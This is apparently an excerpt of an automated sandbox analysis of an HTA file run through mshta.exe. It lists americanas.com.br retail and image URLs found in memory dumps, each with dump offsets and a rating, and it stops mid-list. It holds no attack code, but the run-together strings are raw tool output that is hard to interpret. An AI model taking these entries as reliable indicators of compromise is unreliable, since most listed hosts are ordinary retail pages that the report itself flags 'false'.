00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                      high
                                                                                      https://www.americanas.com.br/categoria/eletrodomesticos?chave=dk_hm_at_edommshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486157607.0000000009DA5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486575456.0000000009DAC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486376745.0000000009DA8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486650176.0000000009DAE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558604615.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.americanas.com.br/categoria/moveis?chave=dk_hm_at_moveis#pmshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12554832793.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AB10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.americanas.com.br/especial/black-friday?chave=dk_hm_ft_00_09_blackfridaymshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                            high
                                                                                            https://www.americanas.com.br/categoria/suplementos-e-vitaminas?chave=dk_hm_at_suplementoam))mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.americanas.com.br/categoria/tv-e-home-theater/tv/g/marca-LG/marca-Lg/marca-lg?viewMode=lmshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512233499.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550466374.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556081838.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542146842.000000000BE13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578758949.000000000BE18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_UD-fe20595d366f.pngmshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574416086.000000000960B000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                  high
                                                                                                  https://images-americanas.b2w.io/spacey/acom/2024/12/04/2-home-destaque_desk-094ccd4f78f0.pngmshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12567444909.00000000095A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574697469.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509895012.0000000009640000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.americanas.com.br/categoria/informatica-e-acessorios?chave=dk_hm_at_infoacessimmshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://empresas.americanas.com.br/hotsite/empresas-cotacao-online?chave=menuacom_aemp_cotacoesmshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504872955.00000000095E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                        unknown
                                                                                                        https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-mobile-b2wadmshta.exe, 00000001.00000003.12487303820.0000000009B93000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555406957.000000000BFFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495634133.000000000A9DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492513851.000000000BEE2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487450474.0000000009B96000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556466118.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487196877.0000000009B90000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508725928.000000000BE41000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12488908794.0000000009B48000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487689897.0000000009B9A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12488646093.0000000009B40000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487377551.0000000009B94000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://www.americanas.com.br/categoria/eletroportateis/maquina-de-costura?chave=pfm_hm_tt_1_0_maquimshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000BFF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551073460.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                            high
                                                                                                            https://www.americanas.com.br/?utm_source=web_app_manifestmshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12499023095.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570171888.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515790688.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557816485.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508517476.000000000BE57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502799829.000000000BE56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511435902.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559023058.0000000002EA7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509384643.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480609397.000000000BE56000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                              high
                                                                                                              https://www.americanas.com.br/categoria/beleza-e-perfumaria?chave=pfm_home_beleza_menumshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574087890.00000000095DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.americanas.com.br/categoria/malas-mochilas-e-acessorios?chave=pfm_home_malas_menumshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                  high
                                                                                                                  https://www.americanas.com.br/categoria/brinquedos?chave=pfm_home_brinquedos_menumshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579155988.000000000BE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://canaldedenuncias.com.br/universoamericanas/6mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574962923.000000000967A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://www.americanas.com.br/especial/afiliados?chave=dk_hm_ft_00_02_afiliadosmshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579079120.000000000BE6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574609531.000000000962B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 